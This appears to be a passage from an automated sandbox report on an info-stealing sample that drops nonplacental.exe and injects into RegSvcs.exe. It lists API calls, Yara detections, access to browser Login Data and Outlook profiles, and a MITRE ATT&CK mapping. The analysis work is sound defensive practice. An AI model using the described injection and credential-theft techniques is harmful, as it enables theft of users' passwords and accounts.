                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0102810A GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_0102810A
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FFA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FFA155
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FFA124 SetUnhandledExceptionFilter,0_2_00FFA124
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0061A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0061A155
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0061A124 SetUnhandledExceptionFilter,2_2_0061A124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040CE09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040E61C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00416F6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004123F1 SetUnhandledExceptionFilter,3_2_004123F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, UltraSpeed.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AE2008
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7E3008
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_010287B1 LogonUserW, 0_2_010287B1
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_00FD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00FD3B3A
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_00FD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00FD48D7
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01034C27 mouse_event, 0_2_01034C27
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\ref_97024130865.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\juvenile\nonplacental.exe "C:\Users\user\AppData\Local\juvenile\nonplacental.exe"
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\juvenile\nonplacental.exe"
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01027CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_01027CAF
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_0102874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_0102874B
Source: ref_97024130865.exe, nonplacental.exe.0.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ref_97024130865.exe, nonplacental.exe Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_00FF862B cpuid 0_2_00FF862B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoA, 3_2_00417A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01004E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_01004E87
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01011E06 GetUserNameW, 0_2_01011E06
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01003F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_01003F3A
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_00FD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00FD49A0
Source: C:\Users\user\Desktop\ref_97024130865.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: ref_97024130865.exe, 00000000.00000002.2063732529.0000000001620000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000002.2081249049.0000000001838000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: ref_97024130865.exe, 00000000.00000002.2063783067.000000000163D000.00000004.00000020.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000002.2197802542.00000000019AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcupdate.exe

                  Stealing of Sensitive Information

Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: nonplacental.exe Binary or memory string: WIN_81
Source: nonplacental.exe Binary or memory string: WIN_XP
Source: nonplacental.exe Binary or memory string: WIN_XPe
Source: nonplacental.exe Binary or memory string: WIN_VISTA
Source: nonplacental.exe Binary or memory string: WIN_7
Source: nonplacental.exe Binary or memory string: WIN_8
Source: nonplacental.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3296227369.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3296052584.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01046283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_01046283
Source: C:\Users\user\Desktop\ref_97024130865.exe Code function: 0_2_01046747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_01046747
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_00666283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 2_2_00666283
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe Code function: 2_2_00666747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_00666747
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information111
                  Scripting
                  2
                  Valid Accounts
                  13
                  Native API
                  111
                  Scripting
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  121
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt2
                  Valid Accounts
                  2
                  Valid Accounts
                  3
                  Obfuscated Files or Information
                  Security Account Manager2
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder
                  21
                  Access Token Manipulation
                  1
                  Software Packing
                  NTDS137
                  System Information Discovery
